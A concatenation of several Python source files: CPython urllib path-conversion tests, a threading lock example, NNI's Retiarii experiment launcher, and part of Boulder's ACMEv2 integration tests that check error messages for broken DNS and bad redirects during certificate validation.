result = urllib.request.pathname2url(given)
self.assertEqual(expect, result,
"pathname2url() failed; %s != %s" %
(expect, result))
given = "make+sure/using_unquote"
expect = os.path.join("make+sure", "using_unquote")
result = urllib.request.url2pathname(given)
self.assertEqual(expect, result,
"url2pathname() failed; %s != %s" %
(expect, result))
@unittest.skipUnless(sys.platform == 'win32',
'test specific to the urllib.url2path function.')
def test_ntpath(self):
given = ('/C:/', '///C:/', '/C|//')
expect = 'C:\\'
for url in given:
result = urllib.request.url2pathname(url)
self.assertEqual(expect, result,
'urllib.request..url2pathname() failed; %s != %s' %
(expect, result))
given = '///C|/path'
expect = 'C:\\path'
result = urllib.request.url2pathname(given)
self.assertEqual(expect, result,
'urllib.request.url2pathname() failed; %s != %s' %
(expect, result))
class Utility_Tests(unittest.TestCase):
"""Testcase to test the various utility functions in the urllib."""
def test_thishost(self):
"""Test the urllib.request.thishost utility function returns a tuple"""
self.assertIsInstance(urllib.request.thishost(), tuple)
class URLopener_Tests(unittest.TestCase):
"""Testcase to test the open method of URLopener class."""
def test_quoted_open(self):
class DummyURLopener(urllib.request.URLopener):
def open_spam(self, url):
return url
with support.check_warnings(
('DummyURLopener style of invoking requests is deprecated.',
DeprecationWarning)):
self.assertEqual(DummyURLopener().open(
'spam://example/ /'),'//example/%20/')
# test the safe characters are not quoted by urlopen
self.assertEqual(DummyURLopener().open(
"spam://c:|windows%/:=&?~#+!$,;'@()*[]|/path/"),
"//c:|windows%/:=&?~#+!$,;'@()*[]|/path/")
# Just commented them out.
# Can't really tell why keep failing in windows and sparc.
# Everywhere else they work ok, but on those machines, sometimes
# fail in one of the tests, sometimes in other. I have a linux, and
# the tests go ok.
# If anybody has one of the problematic environments, please help!
# . Facundo
#
# def server(evt):
# import socket, time
# serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# serv.settimeout(3)
# serv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# serv.bind(("", 9093))
# serv.listen()
# try:
# conn, addr = serv.accept()
# conn.send("1 Hola mundo\n")
# cantdata = 0
# while cantdata < 13:
# data = conn.recv(13-cantdata)
# cantdata += len(data)
# time.sleep(.3)
# conn.send("2 No more lines\n")
# conn.close()
# except socket.timeout:
# pass
# finally:
# serv.close()
# evt.set()
#
# class FTPWrapperTests(unittest.TestCase):
#
# def setUp(self):
# import ftplib, time, threading
# ftplib.FTP.port = 9093
# self.evt = threading.Event()
# threading.Thread(target=server, args=(self.evt,)).start()
# time.sleep(.1)
#
# def tearDown(self):
# self.evt.wait()
#
# def testBasic(self):
# # connects
# ftp = urllib.ftpwrapper("myuser", "mypass", "localhost", 9093, [])
# ftp.close()
#
# def testTimeoutNone(self):
# # global default timeout is ignored
# import socket
# self.assertIsNone(socket.getdefaulttimeout())
# socket.setdefaulttimeout(30)
# try:
# ftp = urllib.ftpwrapper("myuser", "mypass", "localhost", 9093, [])
# finally:
# socket.setdefaulttimeout(None)
# self.assertEqual(ftp.ftp.sock.gettimeout(), 30)
# ftp.close()
#
# def testTimeoutDefault(self):
# # global default timeout is used
# import socket
# self.assertIsNone(socket.getdefaulttimeout())
# socket.setdefaulttimeout(30)
# try:
# ftp = urllib.ftpwrapper("myuser", "mypass", "localhost", 9093, [])
# finally:
# socket.setdefaulttimeout(None)
# self.assertEqual(ftp.ftp.sock.gettimeout(), 30)
# ftp.close()
#
# def testTimeoutValue(self):
# ftp = urllib.ftpwrapper("myuser", "mypass", "localhost", 9093, [],
# timeout=30)
# self.assertEqual(ftp.ftp.sock.gettimeout(), 30)
# ftp.close()
class RequestTests(unittest.TestCase):
"""Unit tests for urllib.request.Request."""
def test_default_values(self):
Request = urllib.request.Request
request = Request("http://www.python.org")
self.assertEqual(request.get_method(), 'GET')
request = Request("http://www.python.org", {})
self.assertEqual(request.get_method(), 'POST')
def test_with_method_arg(self):
Request = urllib.request.Request
request = Request("http://www.python.org", method='HEAD')
self.assertEqual(request.method, 'HEAD')
self.assertEqual(request.get_method(), 'HEAD')
request = Request("http://www.python.org", {}, method='HEAD')
self.assertEqual(request.method, 'HEAD')
self.assertEqual(request.get_method(), 'HEAD')
request = Request("http://www.python.org", method='GET')
self.assertEqual(request.get_method(), 'GET')
request.method = 'HEAD'
self.assertEqual(request.get_method(), 'HEAD')
class URL2PathNameTests(unittest.TestCase):
def test_converting_drive_letter(self):
self.assertEqual(url2pathname("///C|"), 'C:')
self.assertEqual(url2pathname("///C:"), 'C:')
self.assertEqual(url2pathname("///C|/"), 'C:\\')
def test_converting_when_no_drive_letter(self):
# cannot end a raw string in \
self.assertEqual(url2pathname("///C/test/"), r'\\\C\test' '\\')
self.assertEqual(url2pathname("////C/test/"), r'\\C\test' '\\')
def test_simple_compare(self):
self.assertEqual(url2pathname("///C|/foo/bar/spam.foo"),
r'C:\foo\bar\spam.foo')
def test_non_ascii_drive_letter(self):
self.assertRaises(IOError, url2pathname, "///\u00e8|/")
def test_roundtrip_url2pathname(self):
list_of_paths = ['C:',
r'\\\C\test\\',
r'C:\foo\bar\spam.foo'
]
for path in list_of_paths:
self.assertEqual(url2pathname(pathname2url(path)), path)
class PathName2URLTests(unittest.TestCase):
def test_converting_drive_letter(self):
self.assertEqual(pathname2url("C:"), '///C:')
self.assertEqual(pathname2url("C:\\"), '///C:')
def test_converting_when_no_drive_letter(self):
self.assertEqual(pathname2url(r"\\\folder\test" "\\"),
'/////folder/test/')
self.assertEqual(pathname2url(r"\\folder\test" "\\"),
'////folder/test/')
self.assertEqual(pathname2url(r"\folder\test" "\\"),
'/folder/test/')
def test_simple_compare(self):
self.assertEqual(pathname2url(r'C:\foo\bar\spam.foo'),
"///C:/foo/bar/spam.foo" )
def test_long_drive_letter(self):
self.assertRaises(IOError, pathname2url, "XX:\\")
def test_roundtrip_pathname2url(self):
list_of_paths = ['///C:',
'/////folder/test/',
'///C:/foo/bar/spam.foo']
for path in list_of_paths:
self.assertEqual(pathname2url(url2pathname(path)), path)
if __name__ == '__main__':
unittest.main()
|
multiThreadingRaceConditionSolution.py
|
import threading
# global variable x
x = 0
def increment():
"""
function to increment global variable x
"""
global x
x += 1
def thread_task(lock):
"""
task for thread
calls increment function 100000 times.
"""
for _ in range(100000):
lock.acquire()
increment()
lock.release()
def main_task():
global x
# setting global variable x as 0
x = 0
# creating a lock
lock = threading.Lock()
# creating threads
t1 = threading.Thread(target=thread_task, args=(lock,))
t2 = threading.Thread(target=thread_task, args=(lock,))
# start threads
t1.start()
t2.start()
# wait until threads finish their job
t1.join()
t2.join()
if __name__ == "__main__":
for i in range(10):
main_task()
print("Iteration {0}: x = {1}".format(i,x))
|
pytorch.py
|
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import atexit
import logging
import os
import socket
import time
from dataclasses import dataclass
from pathlib import Path
from subprocess import Popen
from threading import Thread
from typing import Any, List, Optional, Union
import colorama
import psutil
import torch
import torch.nn as nn
import nni.runtime.log
from nni.common.device import GPUDevice
from nni.experiment import Experiment, TrainingServiceConfig, launcher, management, rest
from nni.experiment.config import util
from nni.experiment.config.base import ConfigBase, PathLike
from nni.experiment.pipe import Pipe
from nni.tools.nnictl.command_utils import kill_command
from ..codegen import model_to_pytorch_script
from ..converter import convert_to_graph
from ..converter.graph_gen import GraphConverterWithShape
from ..execution import list_models, set_execution_engine
from ..execution.python import get_mutation_dict
from ..graph import Evaluator
from ..integration import RetiariiAdvisor
from ..mutator import Mutator
from ..nn.pytorch.mutator import extract_mutation_from_pt_module, process_inline_mutation
from ..oneshot.interface import BaseOneShotTrainer
from ..strategy import BaseStrategy
_logger = logging.getLogger(__name__)
@dataclass(init=False)
class RetiariiExeConfig(ConfigBase):
experiment_name: Optional[str] = None
search_space: Any = '' # TODO: remove
trial_command: str = '_reserved'
trial_code_directory: PathLike = '.'
trial_concurrency: int
trial_gpu_number: int = 0
devices: Optional[List[Union[str, GPUDevice]]] = None
max_experiment_duration: Optional[str] = None
max_trial_number: Optional[int] = None
max_concurrency_cgo: Optional[int] = None
batch_waiting_time: Optional[int] = None
nni_manager_ip: Optional[str] = None
debug: bool = False
log_level: Optional[str] = None
experiment_working_directory: PathLike = '~/nni-experiments'
# remove configuration of tuner/assessor/advisor
training_service: TrainingServiceConfig
execution_engine: str = 'py'
# input used in GraphConverterWithShape. Currently support shape tuple only.
dummy_input: Optional[List[int]] = None
# input used for benchmark engine.
benchmark: Optional[str] = None
def __init__(self, training_service_platform: Optional[str] = None, **kwargs):
super().__init__(**kwargs)
if training_service_platform is not None:
assert 'training_service' not in kwargs
self.training_service = util.training_service_config_factory(platform=training_service_platform)
self.__dict__['trial_command'] = 'python3 -m nni.retiarii.trial_entry py'
def __setattr__(self, key, value):
fixed_attrs = {'search_space': '',
'trial_command': '_reserved'}
if key in fixed_attrs and fixed_attrs[key] != value:
raise AttributeError(f'{key} is not supposed to be set in Retiarii mode by users!')
# 'trial_code_directory' is handled differently because the path will be converted to absolute path by us
if key == 'trial_code_directory' and not (value == Path('.') or os.path.isabs(value)):
raise AttributeError(f'{key} is not supposed to be set in Retiarii mode by users!')
if key == 'execution_engine':
assert value in ['base', 'py', 'cgo', 'benchmark'], f'The specified execution engine "{value}" is not supported.'
self.__dict__['trial_command'] = 'python3 -m nni.retiarii.trial_entry ' + value
self.__dict__[key] = value
def validate(self, initialized_tuner: bool = False) -> None:
super().validate()
@property
def _canonical_rules(self):
return _canonical_rules
@property
def _validation_rules(self):
return _validation_rules
_canonical_rules = {
'trial_code_directory': util.canonical_path,
'max_experiment_duration': lambda value: f'{util.parse_time(value)}s' if value is not None else None,
'experiment_working_directory': util.canonical_path
}
_validation_rules = {
'trial_code_directory': lambda value: (Path(value).is_dir(), f'"{value}" does not exist or is not directory'),
'trial_concurrency': lambda value: value > 0,
'trial_gpu_number': lambda value: value >= 0,
'max_experiment_duration': lambda value: util.parse_time(value) > 0,
'max_trial_number': lambda value: value > 0,
'log_level': lambda value: value in ["trace", "debug", "info", "warning", "error", "fatal"],
'training_service': lambda value: (type(value) is not TrainingServiceConfig, 'cannot be abstract base class')
}
def preprocess_model(base_model, trainer, applied_mutators, full_ir=True, dummy_input=None):
# TODO: this logic might need to be refactored into execution engine
if full_ir:
try:
script_module = torch.jit.script(base_model)
except Exception as e:
_logger.error('Your base model cannot be parsed by torch.jit.script, please fix the following error:')
raise e
if dummy_input is not None:
# FIXME: this is a workaround as full tensor is not supported in configs
dummy_input = torch.randn(*dummy_input)
converter = GraphConverterWithShape()
base_model_ir = convert_to_graph(script_module, base_model, converter, dummy_input=dummy_input)
else:
base_model_ir = convert_to_graph(script_module, base_model)
# handle inline mutations
mutators = process_inline_mutation(base_model_ir)
else:
base_model_ir, mutators = extract_mutation_from_pt_module(base_model)
base_model_ir.evaluator = trainer
if mutators is not None and applied_mutators:
raise RuntimeError('Have not supported mixed usage of LayerChoice/InputChoice and mutators, '
'do not use mutators when you use LayerChoice/InputChoice')
if mutators is not None:
applied_mutators = mutators
return base_model_ir, applied_mutators
def debug_mutated_model(base_model, trainer, applied_mutators):
"""
Locally run only one trial without launching an experiment for debug purpose, then exit.
For example, it can be used to quickly check shape mismatch.
Specifically, it applies mutators (default to choose the first candidate for the choices)
to generate a new model, then run this model locally.
Parameters
----------
base_model : nni.retiarii.nn.pytorch.nn.Module
the base model
trainer : nni.retiarii.evaluator
the training class of the generated models
applied_mutators : list
a list of mutators that will be applied on the base model for generating a new model
"""
base_model_ir, applied_mutators = preprocess_model(base_model, trainer, applied_mutators)
from ..strategy import _LocalDebugStrategy
strategy = _LocalDebugStrategy()
strategy.run(base_model_ir, applied_mutators)
_logger.info('local debug completed!')
class RetiariiExperiment(Experiment):
def __init__(self, base_model: nn.Module, trainer: Union[Evaluator, BaseOneShotTrainer],
applied_mutators: List[Mutator] = None, strategy: BaseStrategy = None):
# TODO: The current design of init interface of Retiarii experiment needs to be reviewed.
self.config: RetiariiExeConfig = None
self.port: Optional[int] = None
self.base_model = base_model
self.trainer = trainer
self.applied_mutators = applied_mutators
self.strategy = strategy
self._dispatcher = RetiariiAdvisor()
self._dispatcher_thread: Optional[Thread] = None
self._proc: Optional[Popen] = None
self._pipe: Optional[Pipe] = None
def _start_strategy(self):
base_model_ir, self.applied_mutators = preprocess_model(
self.base_model, self.trainer, self.applied_mutators,
full_ir=self.config.execution_engine not in ['py', 'benchmark'],
dummy_input=self.config.dummy_input
)
_logger.info('Start strategy...')
self.strategy.run(base_model_ir, self.applied_mutators)
_logger.info('Strategy exit')
# TODO: find out a proper way to show no more trial message on WebUI
# self._dispatcher.mark_experiment_as_ending()
def start(self, port: int = 8080, debug: bool = False) -> None:
"""
Start the experiment in background.
This method will raise exception on failure.
If it returns, the experiment should have been successfully started.
Parameters
----------
port
The port of web UI.
debug
Whether to start in debug mode.
"""
atexit.register(self.stop)
# we will probably need a execution engine factory to make this clean and elegant
if self.config.execution_engine == 'base':
from ..execution.base import BaseExecutionEngine
engine = BaseExecutionEngine()
elif self.config.execution_engine == 'cgo':
from ..execution.cgo_engine import CGOExecutionEngine
assert self.config.training_service.platform == 'remote', \
"CGO execution engine currently only supports remote training service"
assert self.config.batch_waiting_time is not None
devices = self._construct_devices()
engine = CGOExecutionEngine(devices,
max_concurrency=self.config.max_concurrency_cgo,
batch_waiting_time=self.config.batch_waiting_time)
elif self.config.execution_engine == 'py':
from ..execution.python import PurePythonExecutionEngine
engine = PurePythonExecutionEngine()
elif self.config.execution_engine == 'benchmark':
from ..execution.benchmark import BenchmarkExecutionEngine
engine = BenchmarkExecutionEngine(self.config.benchmark)
set_execution_engine(engine)
self.id = management.generate_experiment_id()
if self.config.experiment_working_directory is not None:
log_dir = Path(self.config.experiment_working_directory, self.id, 'log')
else:
log_dir = Path.home() / f'nni-experiments/{self.id}/log'
nni.runtime.log.start_experiment_log(self.id, log_dir, debug)
self._proc, self._pipe = launcher.start_experiment_retiarii(self.id, self.config, port, debug)
assert self._proc is not None
assert self._pipe is not None
self.port = port # port will be None if start up failed
# dispatcher must be launched after pipe initialized
# the logic to launch dispatcher in background should be refactored into dispatcher api
self._dispatcher = self._create_dispatcher()
self._dispatcher_thread = Thread(target=self._dispatcher.run)
self._dispatcher_thread.start()
ips = [self.config.nni_manager_ip]
for interfaces in psutil.net_if_addrs().values():
for interface in interfaces:
if interface.family == socket.AF_INET:
ips.append(interface.address)
ips = [f'http://{ip}:{port}' for ip in ips if ip]
msg = 'Web UI URLs: ' + colorama.Fore.CYAN + ' '.join(ips) + colorama.Style.RESET_ALL
_logger.info(msg)
exp_status_checker = Thread(target=self._check_exp_status)
exp_status_checker.start()
self._start_strategy()
# TODO: the experiment should be completed, when strategy exits and there is no running job
_logger.info('Waiting for experiment to become DONE (you can ctrl+c if there is no running trial jobs)...')
exp_status_checker.join()
def _construct_devices(self):
devices = []
if hasattr(self.config.training_service, 'machine_list'):
for machine in self.config.training_service.machine_list:
assert machine.gpu_indices is not None, \
'gpu_indices must be set in RemoteMachineConfig for CGO execution engine'
for gpu_idx in machine.gpu_indices:
devices.append(GPUDevice(machine.host, gpu_idx))
return devices
def _create_dispatcher(self):
return self._dispatcher
def run(self, config: RetiariiExeConfig = None, port: int = 8080, debug: bool = False) -> str:
"""
Run the experiment.
This function will block until experiment finish or error.
"""
if isinstance(self.trainer, BaseOneShotTrainer):
self.trainer.fit()
else:
assert config is not None, 'You are using classic search mode, config cannot be None!'
self.config = config
self.start(port, debug)
def _check_exp_status(self) -> bool:
"""
Run the experiment.
This function will block until experiment finish or error.
Return `True` when experiment done; or return `False` when experiment failed.
"""
try:
while True:
time.sleep(10)
# this if is to deal with the situation that
# nnimanager is cleaned up by ctrl+c first
if self._proc.poll() is None:
status = self.get_status()
else:
return False
if status == 'DONE' or status == 'STOPPED':
return True
if status == 'ERROR':
return False
except KeyboardInterrupt:
_logger.warning('KeyboardInterrupt detected')
finally:
self.stop()
def stop(self) -> None:
"""
Stop background experiment.
"""
_logger.info('Stopping experiment, please wait...')
atexit.unregister(self.stop)
# stop strategy first
if self._dispatcher_thread is not None:
self._dispatcher.stopping = True
self._dispatcher_thread.join(timeout=1)
if self.id is not None:
nni.runtime.log.stop_experiment_log(self.id)
if self._proc is not None:
try:
# this if is to deal with the situation that
# nnimanager is cleaned up by ctrl+c first
if self._proc.poll() is None:
rest.delete(self.port, '/experiment')
except Exception as e:
_logger.exception(e)
_logger.warning('Cannot gracefully stop experiment, killing NNI process...')
kill_command(self._proc.pid)
if self._pipe is not None:
self._pipe.close()
self.id = None
self.port = None
self._proc = None
self._pipe = None
self._dispatcher = None
self._dispatcher_thread = None
_logger.info('Experiment stopped')
def export_top_models(self, top_k: int = 1, optimize_mode: str = 'maximize', formatter: str = 'dict') -> Any:
"""
Export several top performing models.
For one-shot algorithms, only top-1 is supported. For others, ``optimize_mode`` and ``formatter`` are
available for customization.
top_k : int
How many models are intended to be exported.
optimize_mode : str
``maximize`` or ``minimize``. Not supported by one-shot algorithms.
``optimize_mode`` is likely to be removed and defined in strategy in future.
formatter : str
Support ``code`` and ``dict``. Not supported by one-shot algorithms.
If ``code``, the python code of model will be returned.
If ``dict``, the mutation history will be returned.
"""
if formatter == 'code':
assert self.config.execution_engine != 'py', 'You should use `dict` formatter when using Python execution engine.'
if isinstance(self.trainer, BaseOneShotTrainer):
assert top_k == 1, 'Only support top_k is 1 for now.'
return self.trainer.export()
else:
all_models = filter(lambda m: m.metric is not None, list_models())
assert optimize_mode in ['maximize', 'minimize']
all_models = sorted(all_models, key=lambda m: m.metric, reverse=optimize_mode == 'maximize')
assert formatter in ['code', 'dict'], 'Export formatter other than "code" and "dict" is not supported yet.'
if formatter == 'code':
return [model_to_pytorch_script(model) for model in all_models[:top_k]]
elif formatter == 'dict':
return [get_mutation_dict(model) for model in all_models[:top_k]]
def retrain_model(self, model):
"""
this function retrains the exported model, and test it to output test accuracy
"""
raise NotImplementedError
|
v2_integration.py
|
# -*- coding: utf-8 -*-
"""
Integration test cases for ACMEv2 as implemented by boulder-wfe2.
"""
import subprocess
import requests
import datetime
import time
import os
import json
import re
import OpenSSL
from cryptography import x509
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.hazmat.primitives import serialization
import chisel2
from helpers import *
from acme import errors as acme_errors
from acme.messages import Status, CertificateRequest, Directory
from acme import crypto_util as acme_crypto_util
from acme import client as acme_client
from acme import messages
from acme import challenges
from acme import errors
import josepy
import tempfile
import shutil
import atexit
import random
import string
import threading
from http.server import HTTPServer, BaseHTTPRequestHandler
import socketserver
import socket
import challtestsrv
challSrv = challtestsrv.ChallTestServer()
def test_multidomain():
chisel2.auth_and_issue([random_domain(), random_domain()])
def test_wildcardmultidomain():
"""
Test issuance for a random domain and a random wildcard domain using DNS-01.
"""
chisel2.auth_and_issue([random_domain(), "*."+random_domain()], chall_type="dns-01")
def test_http_challenge():
chisel2.auth_and_issue([random_domain(), random_domain()], chall_type="http-01")
def rand_http_chall(client):
d = random_domain()
csr_pem = chisel2.make_csr([d])
order = client.new_order(csr_pem)
authzs = order.authorizations
for a in authzs:
for c in a.body.challenges:
if isinstance(c.chall, challenges.HTTP01):
return d, c.chall
raise(Exception("No HTTP-01 challenge found for random domain authz"))
def check_challenge_dns_err(chalType):
"""
check_challenge_dns_err tests that performing an ACME challenge of the
specified type to a hostname that is configured to return SERVFAIL for all
queries produces the correct problem type and detail message.
"""
client = chisel2.make_client()
# Create a random domains.
d = random_domain()
# Configure the chall srv to SERVFAIL all queries for that domain.
challSrv.add_servfail_response(d)
# Expect a DNS problem with a detail that matches a regex
expectedProbType = "dns"
expectedProbRegex = re.compile(r"DNS problem: SERVFAIL looking up (A|AAAA|TXT|CAA) for {0}".format(d))
# Try and issue for the domain with the given challenge type.
failed = False
try:
chisel2.auth_and_issue([d], client=client, chall_type=chalType)
except acme_errors.ValidationError as e:
# Mark that the auth_and_issue failed
failed = True
# Extract the failed challenge from each failed authorization
for authzr in e.failed_authzrs:
c = None
if chalType == "http-01":
c = chisel2.get_chall(authzr, challenges.HTTP01)
elif chalType == "dns-01":
c = chisel2.get_chall(authzr, challenges.DNS01)
elif chalType == "tls-alpn-01":
c = chisel2.get_chall(authzr, challenges.TLSALPN01)
else:
raise(Exception("Invalid challenge type requested: {0}".format(challType)))
# The failed challenge's error should match expected
error = c.error
if error is None or error.typ != "urn:ietf:params:acme:error:{0}".format(expectedProbType):
raise(Exception("Expected {0} prob, got {1}".format(expectedProbType, error.typ)))
if not expectedProbRegex.match(error.detail):
raise(Exception("Prob detail did not match expectedProbRegex, got \"{0}\"".format(error.detail)))
finally:
challSrv.remove_servfail_response(d)
# If there was no exception that means something went wrong. The test should fail.
if failed is False:
raise(Exception("No problem generated issuing for broken DNS identifier"))
def test_http_challenge_dns_err():
"""
test_http_challenge_dns_err tests that a HTTP-01 challenge for a domain
with broken DNS produces the correct problem response.
"""
check_challenge_dns_err("http-01")
def test_dns_challenge_dns_err():
"""
test_dns_challenge_dns_err tests that a DNS-01 challenge for a domain
with broken DNS produces the correct problem response.
"""
check_challenge_dns_err("dns-01")
def test_tls_alpn_challenge_dns_err():
"""
test_tls_alpn_challenge_dns_err tests that a TLS-ALPN-01 challenge for a domain
with broken DNS produces the correct problem response.
"""
check_challenge_dns_err("tls-alpn-01")
def test_http_challenge_broken_redirect():
"""
test_http_challenge_broken_redirect tests that a common webserver
mis-configuration receives the correct specialized error message when attempting
an HTTP-01 challenge.
"""
client = chisel2.make_client()
# Create an authz for a random domain and get its HTTP-01 challenge token
d, chall = rand_http_chall(client)
token = chall.encode("token")
# Create a broken HTTP redirect similar to a sort we see frequently "in the wild"
challengePath = "/.well-known/acme-challenge/{0}".format(token)
redirect = "http://{0}.well-known/acme-challenge/bad-bad-bad".format(d)
challSrv.add_http_redirect(
challengePath,
redirect)
# Expect the specialized error message
expectedError = "Fetching {0}: Invalid host in redirect target \"{1}.well-known\". Check webserver config for missing '/' in redirect target.".format(redirect, d)
# NOTE(@cpu): Can't use chisel2.expect_problem here because it doesn't let
# us interrogate the detail message easily.
try:
chisel2.auth_and_issue([d], client=client, chall_type="http-01")
except acme_errors.ValidationError as e:
for authzr in e.failed_authzrs:
c = chisel2.get_chall(authzr, challenges.HTTP01)
error = c.error
if error is None or error.typ != "urn:ietf:params:acme:error:connection":
raise(Exception("Expected connection prob, got %s" % (error.__str__())))
if error.detail != expectedError:
raise(Exception("Expected prob detail %s, got %s" % (expectedError, error.detail)))
challSrv.remove_http_redirect(challengePath)
def test_failed_validation_limit():
"""
Fail a challenge repeatedly for the same domain, with the same account. Once
we reach the rate limit we should get a rateLimitedError. Note that this
depends on the specific threshold configured in rate-limit-policies.yml.
This also incidentally tests a fix for
https://github.com/letsencrypt/boulder/issues/4329. We expect to get
ValidationErrors, eventually followed by a rate limit error.
"""
domain = "fail." + random_domain()
csr_pem = chisel2.make_csr([domain])
client = chisel2.make_client()
threshold = 3
for _ in range(threshold):
order = client.new_order(csr_pem)
chall = order.authorizations[0].body.challenges[0]
client.answer_challenge(chall, chall.response(client.net.key))
try:
client.poll_and_finalize(order)
except errors.ValidationError as e:
pass
chisel2.expect_problem("urn:ietf:params:acme:error:rateLimited",
lambda: chisel2.auth_and_issue([domain], client=client))
def test_http_challenge_loop_redirect():
client = chisel2.make_client()
# Create an authz for a random domain and get its HTTP-01 challenge token
d, chall = rand_http_chall(client)
token = chall.encode("token")
# Create a HTTP redirect from the challenge's validation path to itself
challengePath = "/.well-known/acme-challenge/{0}".format(token)
challSrv.add_http_redirect(
challengePath,
"http://{0}{1}".format(d, challengePath))
# Issuing for the the name should fail because of the challenge domains's
# redirect loop.
chisel2.expect_problem("urn:ietf:params:acme:error:connection",
lambda: chisel2.auth_and_issue([d], client=client, chall_type="http-01"))
challSrv.remove_http_redirect(challengePath)
def test_http_challenge_badport_redirect():
client = chisel2.make_client()
# Create an authz for a random domain and get its HTTP-01 challenge token
d, chall = rand_http_chall(client)
token = chall.encode("token")
# Create a HTTP redirect from the challenge's validation path to a host with
# an invalid port.
challengePath = "/.well-known/acme-challenge/{0}".format(token)
challSrv.add_http_redirect(
challengePath,
"http://{0}:1337{1}".format(d, challengePath))
# Issuing for the name should fail because of the challenge domain's
# invalid port redirect.
chisel2.expect_problem("urn:ietf:params:acme:error:connection",
lambda: chisel2.auth_and_issue([d], client=client, chall_type="http-01"))
challSrv.remove_http_redirect(challengePath)
def test_http_challenge_badhost_redirect():
client = chisel2.make_client()
# Create an authz for a random domain and get its HTTP-01 challenge token
d, chall = rand_http_chall(client)
token = chall.encode("token")
# Create a HTTP redirect from the challenge's validation path to a bare IP
# hostname.
challengePath = "/.well-known/acme-challenge/{0}".format(token)
challSrv.add_http_redirect(
challengePath,
"https://127.0.0.1{0}".format(challengePath))
# Issuing for the name should cause a connection error because the redirect
# domain name is an IP address.
chisel2.expect_problem("urn:ietf:params:acme:error:connection",
lambda: chisel2.auth_and_issue([d], client=client, chall_type="http-01"))
challSrv.remove_http_redirect(challengePath)
def test_http_challenge_badproto_redirect():
client = chisel2.make_client()
# Create an authz for a random domain and get its HTTP-01 challenge token
d, chall = rand_http_chall(client)
token = chall.encode("token")
# Create a HTTP redirect from the challenge's validation path to whacky
# non-http/https protocol URL.
challengePath = "/.well-known/acme-challenge/{0}".format(token)
challSrv.add_http_redirect(
challengePath,
"gopher://{0}{1}".format(d, challengePath))
# Issuing for the name should cause a connection error because the redirect
# domain name is an IP address.
chisel2.expect_problem("urn:ietf:params:acme:error:connection",
lambda: chisel2.auth_and_issue([d], client=client, chall_type="http-01"))
challSrv.remove_http_redirect(challengePath)
def test_http_challenge_http_redirect():
client = chisel2.make_client()
# Create an authz for a random domain and get its HTTP-01 challenge token
d, chall = rand_http_chall(client)
token = chall.encode("token")
# Calculate its keyauth so we can add it in a special non-standard location
# for the redirect result
resp = chall.response(client.net.key)
keyauth = resp.key_authorization
challSrv.add_http01_response("http-redirect", keyauth)
# Create a HTTP redirect from the challenge's validation path to some other
# token path where we have registered the key authorization.
challengePath = "/.well-known/acme-challenge/{0}".format(token)
redirectPath = "/.well-known/acme-challenge/http-redirect?params=are&important=to¬=lose"
challSrv.add_http_redirect(
challengePath,
"http://{0}{1}".format(d, redirectPath))
chisel2.auth_and_issue([d], client=client, chall_type="http-01")
challSrv.remove_http_redirect(challengePath)
challSrv.remove_http01_response("http-redirect")
history = challSrv.http_request_history(d)
challSrv.clear_http_request_history(d)
# There should have been at least two GET requests made to the
# challtestsrv. There may have been more if remote VAs were configured.
if len(history) < 2:
raise(Exception("Expected at least 2 HTTP request events on challtestsrv, found {1}".format(len(history))))
initialRequests = []
redirectedRequests = []
for request in history:
# All requests should have been over HTTP
if request['HTTPS'] is True:
raise(Exception("Expected all requests to be HTTP"))
# Initial requests should have the expected initial HTTP-01 URL for the challenge
if request['URL'] == challengePath:
initialRequests.append(request)
# Redirected requests should have the expected redirect path URL with all
# its parameters
elif request['URL'] == redirectPath:
redirectedRequests.append(request)
else:
raise(Exception("Unexpected request URL {0} in challtestsrv history: {1}".format(request['URL'], request)))
# There should have been at least 1 initial HTTP-01 validation request.
if len(initialRequests) < 1:
raise(Exception("Expected {0} initial HTTP-01 request events on challtestsrv, found {1}".format(validation_attempts, len(initialRequests))))
# There should have been at least 1 redirected HTTP request for each VA
if len(redirectedRequests) < 1:
raise(Exception("Expected {0} redirected HTTP-01 request events on challtestsrv, found {1}".format(validation_attempts, len(redirectedRequests))))
def test_http_challenge_https_redirect():
client = chisel2.make_client()
# Create an authz for a random domain and get its HTTP-01 challenge token
d, chall = rand_http_chall(client)
token = chall.encode("token")
# Calculate its keyauth so we can add it in a special non-standard location
# for the redirect result
resp = chall.response(client.net.key)
keyauth = resp.key_authorization
challSrv.add_http01_response("https-redirect", keyauth)
# Create a HTTP redirect from the challenge's validation path to an HTTPS
# path with some parameters
challengePath = "/.well-known/acme-challenge/{0}".format(token)
redirectPath = "/.well-known/acme-challenge/https-redirect?params=are&important=to¬=lose"
challSrv.add_http_redirect(
challengePath,
"https://{0}{1}".format(d, redirectPath))
# Also add an A record for the domain pointing to the interface that the
# HTTPS HTTP-01 challtestsrv is bound.
challSrv.add_a_record(d, ["10.77.77.77"])
try:
chisel2.auth_and_issue([d], client=client, chall_type="http-01")
except errors.ValidationError as e:
problems = []
for authzr in e.failed_authzrs:
for chall in authzr.body.challenges:
error = chall.error
if error:
problems.append(error.__str__())
raise(Exception("validation problem: %s" % "; ".join(problems)))
challSrv.remove_http_redirect(challengePath)
challSrv.remove_a_record(d)
history = challSrv.http_request_history(d)
challSrv.clear_http_request_history(d)
# There should have been at least two GET requests made to the challtestsrv by the VA
if len(history) < 2:
raise(Exception("Expected 2 HTTP request events on challtestsrv, found {0}".format(len(history))))
initialRequests = []
redirectedRequests = []
for request in history:
# Initial requests should have the expected initial HTTP-01 URL for the challenge
if request['URL'] == challengePath:
initialRequests.append(request)
# Redirected requests should have the expected redirect path URL with all
# its parameters
elif request['URL'] == redirectPath:
redirectedRequests.append(request)
else:
raise(Exception("Unexpected request URL {0} in challtestsrv history: {1}".format(request['URL'], request)))
# There should have been at least 1 initial HTTP-01 validation request.
if len(initialRequests) < 1:
raise(Exception("Expected {0} initial HTTP-01 request events on challtestsrv, found {1}".format(validation_attempts, len(initialRequests))))
# All initial requests should have been over HTTP
for r in initialRequests:
if r['HTTPS'] is True:
raise(Exception("Expected all initial requests to be HTTP, got %s" % r))
# There should have been at least 1 redirected HTTP request for each VA
if len(redirectedRequests) < 1:
raise(Exception("Expected {0} redirected HTTP-01 request events on challtestsrv, found {1}".format(validation_attempts, len(redirectedRequests))))
# All the redirected requests should have been over HTTPS with the correct
# SNI value
for r in redirectedRequests:
if r['HTTPS'] is False:
